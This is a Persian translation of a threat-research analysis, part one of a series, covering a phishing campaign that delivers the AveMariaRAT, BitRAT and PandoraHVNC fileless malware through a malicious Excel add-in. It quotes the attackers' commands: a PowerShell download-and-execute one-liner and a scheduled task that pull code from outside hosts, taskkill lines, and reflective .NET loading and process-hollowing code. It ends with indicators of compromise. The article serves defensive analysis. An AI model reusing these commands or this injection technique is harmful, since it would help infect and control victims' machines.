کارزار فیشینگ سه بدافزار Fileless؛ بخش اول

محققان شرکت فورتی‌نت (Fortinet) کارزار فیشینگی (Phishing) را شناسایی کرده‌اند که در آن مهاجمان اقدام به ارسال سه بدافزار بدون فایل (Fileless Malware) به نام‌‌های AveMariaRAT ،BitRAT و PandoraHVNC بر روی دستگاه قربانی می‌کردند. در این کارزار فیشینگی، پس از اجرای کد مخرب بدافزارهای مذکور، مهاجمان قادر به سرقت اطلاعات حساس از دستگاه‌های قربانیان می‌باشند.

در این مقاله به تحلیل کارزار مذکور می‌پردازیم و نشان خواهیم داد که یک کارزار فیشینگ چگونه می‌تواند بدافزار Fileless را به دستگاه قربانی منتقل کند، از چه مکانیزمی برای بارگذاری، استقرار و اجرای بدافزار بدون فایل در هدف موردنظر استفاده می‌کند و چگونه بر روی سیستم قربانی‌ ماندگار می‌شود.

این کارزار دارای درجه شدت «حیاتی» (Critical) می‌باشد و بر روی سیستم‌های Microsoft Windows تاثیر می‌گذارد، دستگاه قربانی را کنترل نموده و اطلاعات حساس و حیاتی را سرقت می‌کند.

 نمونه ایمیل فیشینگ

نمونه ایمیل فیشینگ دریافت شده در این کارزار در شکل زیر نشان داده شده است. ایمیل مذکور به عنوان یک اعلان گزارش پرداخت از یک منبع به ظاهر معتبر ارسال شده است.

در این ایمیل، مهاجم سعی کرده گیرنده را فریب دهد تا سند Excel پیوست شده را جهت دریافت جزئیات گزارش باز کند.

نگاهی به سند Excel پیوست شده

سند Excel پیوست شده به این ایمیل‌های فیشینگ، Remittance-Details-951244.xlam نامگذاری شده است. در واقع این فایل، یک افزونه Excelا(*.xlam) است که حاوی ماکروهای مخرب می‌باشد. همانطور که در شکل زیر نمایش داده شده، هنگامی که گیرنده آن را در برنامه Microsoft Excel اجرا می‌کند، یک اخطار امنیتی ظاهر شده که از کاربر می‌پرسد آیا می‌خواهد ماکروها را فعال کند.

این ماکرو بصورت خودکار با استفاده از یک تابع  VBAا(Visual Basic Application) به نام ()Auto_Open با باز شدن فایل Excel اجرا می‌شود.

تحلیل کد VBA در داخل تابع، نشان می‌دهد که این کد یک فرمان رشته‌ای رمزگشایی می‌کند و آن را با استفاده از یک WMI Object (Windows Management Instrumentation) اجرا می‌نماید.

شکل بالا قطعه‌ای از کد VBA مربوط به تابع ()Auto_Open را نشان می‌دهد که در آن یک WMI Object جهت اجرای فرمان رشته‌ رمزگشایی شده زیر ایجاد می‌شود همانطور که در پایین شکل بالا نشان داده شده است.

C:\\ProgramData\\ddond.com hxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file

قبل از آن، فایل C:\Windows\System32\mshta.exe را در \C:\ProgramData کپی می‌کند و آن را به ddond.com تغییر نام می‌دهد. mshta.exe یک فایل باینری معتبر است که بصورت پیش‌فرض بر روی تمامی دستگاه‌ها با سیستم‌عامل Windows وجود دارد. این فایل محلی برای اجرای فایل‌های Microsoft HTML Application (HTA) طراحی شده است. اکنون C:\ProgramData\ddond.com نسخه رونوشت mshta.exe می‌باشد که در طول کارزار مورد استفاده قرار خواهد گرفت. برای مثال برای گیج کردن محققان، از فایل کپی شده ddond.com جهت دانلود و اجرای فایل html مخرب به جای mshta.exe استفاده می‌کند.

HTML + JavaScript + PowerShell

فایل APRL27.htm که توسط ddond.com (یعنی رونوشت mshta.exe) فراخوانی شده، دانلود می‌شود. فایل HTML حاوی یک قطعه کد JavaScript است که با استفاده از تابع URL Escape کدگذاری شده است. شکل زیر نسخه رمزگشایی و ساده شده کد را نشان می‌دهد.

با استفاده از دستورالعمل زیر یک Object به نام Wscript.Shell ایجاد می‌شود.

chuchukukukaokiwDasidow = new ActiveXObject(_0x5b4b3f(0x391, 0x391));

Wscript.Shell با استفاده از تابع 0x5b4b3f(0x391, 0x391)_ که برای برگرداندن یک رشته و شاخص آن استفاده می‌شود، بازیابی می‌شود.

یک OS Shell Object نیز به نام chuchukukukaokiwDasidow ایجاد می‌شود که برای اجرای یک برنامه مورد استفاده قرار می‌گیرد. همانطور که در شکل بالا نشان داده شده، پنج برنامه کاربردی خط فرمان زیر را اجرا می‌نماید:

• powershell  $MMMMMMM=((neW-ObjEcT ((“Net.Webclient”))).((“Downloadstring”)).invoke(((“hxxps[:]//taxfile[.]mediafire.com/file/175lr9wsa5n97x8/mainpw.dll/file”))));Invoke-Expression $MMMMMMM
• schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr “””%programdata%\ddond.com “””””” hxxps[:]//www[.]mediafire.com/file/c3zcoq7ay6nql9i/back.htm/file”””
• taskkill /f /im WinWord.exe
• taskkill /f /im Excel.exe
• taskkill /f /im POWERPNT.exe

سپس برنامه PowerShell اجرا می‌شود تا یک فایل PowerShell به نام mainpw.dll را دانلود کرده و سپس آن را اجرا کند. در ادامه schtasks را جهت ایجاد یک برنامه زمانبندی شده به نام calendersw در Task Scheduler اجرا می‌کند. فرمان زیر هر 82 دقیقه یکبار انجام می‌شود که به نظر می‌رسد مربوط به عملیات Parsing فایل APRL27.html است. این سازوکار پایداری است و پس از شروع، back.htm وظایف برنامه‌ریزی شده بیشتری را اضافه می‌کند.

C:\ProgramData\ddond.com hxxps[:]//www[.]mediafire.com/file/c3zcoq7ay6nql9i/back.htm/file

همچنین taskkill را جهت متوقف‌سازی پروسه‌های MS Word (WinWord.exe) ،MS Excel (Excel.exe) و MS PowerPoint (POWERPNT.exe) اجرا می‌کند.

شکل بالا نمایی از HTTP proxy است که بسته‌های APRL27.htm تا mainpw.dll را که در کادر قرمز مشخص شده‌اند، نشان می‌دهد. کادر سبز (back.htm) و کادر آبی (Start.htm) گروه دیگری از درخواست‌های مربوط به فرمان ddond.com هستند که توسط Task Scheduler شروع شده‌اند.

فایل mainpw.dll (با حجم 7.58 مگابایت) دارای تعداد زیادی کد PowerShell است که می‌توان آن را برای سه بدافزار Fileless به سه بخش تقسیم کرد. شکل زیر ساختار ساده شده mainpw.dll را نشان می‌دهد.

این کد دارای سه بخش اصلی است و از منطق یکسانی برای هر یک از بدافزارها استفاده می‌کند. این کار برای هر بدافزار از طریق متغیرهای آن انجام می‌شود.

• اولین متغیر، یعنی hexString$ حاوی روشی پویا است که GZip را از حالت فشرده خارج می‌کند.
• دومین hexString$ حاوی کد پویای PowerShell است که کدمخرب بدافزار (Payload) و یک ماژول Net. داخلی را جهت استقرار کد مخرب از حالت فشرده خارج می‌کند.
• nona$ یک آرایه بزرگ است که حاوی کد مخرب و فشرده شده بدافزار (GZip-compressed malware payload) می‌باشد. کدهای PowerShell زیر از دومین hexString$ استخراج شده‌اند و جهت فشرده کردن کد مخرب بدافزار در nona$ و ماژول داخلی Net. بکارگرفته می‌شوند تا کد مخرب را در دو متغیر محلی اجرا نمایند.

• [byte[]] $RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH= Get-
  DecompressedByteArray $nona
• [byte[]] $RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG=Get-                       
  DecompressedByteArray $STRDYFUGIHUYTYRTESRDYUGIRI

در پایان هر قطعه کد بدافزار، تابع ()Load، ماژول Net. داخلی را از RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG$ بارگذاری و فراخوانی می‌کند.

سپس قطعه کد، تابع ()Invoke را فراخوانی می‌کند تا تابع مربوط به ماژول داخلی Net. یعنی ()projFUD.PA.Execute را با دو پارامتر که یکی فایل exe مربوط به کل مسیر و دیگری کد مخرب بدافزار Fileless است، فراخوانی کند. در اینجا بخشی از کد PowerShell که برای اولین بدافزار مورد استفاده قرار گرفته، نشان داده شده است.

[Reflection.Assembly]::Load($RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG).GetType(‘projFUD.PA’).GetMethod(‘Execute’)
.Invoke($null,[object[]] ( ‘C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe’,$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH))

ماژول پویای NET.

ماژول پویا و داخلی NET. از دومین متغیر hexString$ استخراج می‌شود. تابع آن ()projFUD.PA.Execute از PowerShell فراخوانی می‌شود که در آن projFUD فضای نام (name space)، PA نام کلاس و ()Execute عضوی از کلاس PA است. شکل زیر توقف (Break) برنامه اشکال‌یاب (Debugger) را در ورودی این تابع نشان می‌دهد.

در پایین شکل، در زیر منوی متغیر Locals، دو پارامتر ارسال شده را مشاهده می‌کنیم. سپس پروسه Process Hollowing یعنی تعویض فایل اجرایی و جایگزینی کدمخرب به جای آن انجام می‌شود تا کد مخرب بدافزار را به پروسه جدید ایجاد شده aspnet_compiler.exe تزریق کند.

سپس تابع Execute() ،API مربوط به Windows به نام (()CreateProcessA) را فراخوانی می‌کند تا پروسه‌ای از aspnet_compiler.exe را با فرمان Create Flag 0x8000004 اجرا کند. این ترکیبی از CREATE_NO_WINDOW و CREATE_SUSPENDED است، همانطور که در شکل بالا نشان داده شده است.

در ادامه حافظه را به این پروسه تخصیص داده و داده‌های مربوط به کد مخرب بدافزار را در آن مستقر و بارگذاری می‌کند. مقدار را در آدرس حافظه 0x7EFDE008 تغییر می‌دهد، جایی که در آن Process Environment Block – به اختصار PEB – را ذخیره می‌کند و رجیستری فرآیند را به گونه‌ای تغییر می‌دهد که Extended Instruction Pointer – به اختصار EIP – آن به کد مخرب بدافزار کپی شده اشاره کند. برای اتمام، باید چندین بار API مربوط به ()WriteProcessMemory و همچنین ()Wow64SetThreadContext فراخوانی شود.

پس از تکمیل تمام مراحل فوق، در نهایت API مربوط به ()ResumeThread فراخوانی می‌شود تا فرآیند بارگذاری بدافزار را اجرا کند. در زیر کد مورد استفاده در فراخوانی این API آمده است. processInformation.ThreadHandle، پروسه تازه ایجاد شده را کنترل می‌کند.

num15 = (int)PA.LX99ujNZ7X3YScj6T4(PA.ResumeThread, 
PA.vgxYHnXuOV51G6NIu3(“010010010110111001110110011011110110101101100101”), CallType.Method, 
new object[]
                                {
                                    processInformation.ThreadHandle
                                });

جمع‌بندی

در این مقاله به تحلیل یکی از حملاتی که در آن از بدافزارهای Fileless استفاده شده، پرداختیم و توضیح دادیم که چگونه یک پیوست Excel در یک ایمیل فیشینگ به دستگاه قربانی ارسال می‌شود و چگونه کد مخرب داخل سند Excel پس از باز شدن توسط گیرنده به‌طور خودکار اجرا می‌شود.

همچنین نشان دادیم که چگونه کد VBA با استفاده از فرمان کپی شده mshta.exe از راه دور به یک فایل htmlا(APRL27.htm) دسترسی پیدا می‌کند. این فایل حاوی کدهای مخرب JavaScript است که بعداً اجرا می‌شود. همچنین با افزودن وظایف به Task Scheduler در دستگاه قربانی ماندگار می‌شود.

همچنین نشان دادیم که چگونه این کارزار از طریق یک فایل PowerShell جهت دور زدن راهکارهای امنیتی دانلود می‌شوند و چگونه بعداً از طریق پروسه Process Hollowing یعنی تعویض فایل اجرایی و جایگزینی کدمخرب به جای آن در پروسه‌های موردنظر مهاجم مستقر و اجرا می‌شوند.

در بخش دوم این مقاله، بر روی سه بدافزار Fileless این کارزار به نام‌‌های AveMariaRAT ،BitRAT  و PandoraHVNC تمرکز خواهم کرد تا ببینم آنها روی دستگاه قربانی چه می‌کنند و همچنین چه نوع داده‌هایی را می‌توانند سرقت کنند.

نشانه‌های آلودگی (IoC):

URL:

hxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file

hxxps://www[.]mediafire[.]com/file/c3zcoq7ay6nql9i/back[.]htm/file

hxxps://www[.]mediafire[.]com/file/jjyy2npmnhx6o49/Start[.]htm/file

hxxps://taxmogalupupitpamobitola[.]blogspot[.]com/atom[.]xml

SHA-256:

 [Remittance-Details-951244-1.xlam]:8007BB9CAA6A1456FFC829270BE2E62D1905D5B71E9DC9F9673DEC9AFBF13BFC

 [APRL27.htm]: D71ADD25520799720ADD43A5F4925B796BEA11BF55644990B4B9A70B7EAEACBA

[mainpw.dll]:3D71A243E5D9BA44E3D71D4DA15D928658F92B2F0A220B7DEFE0136108871449

منبع:

https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware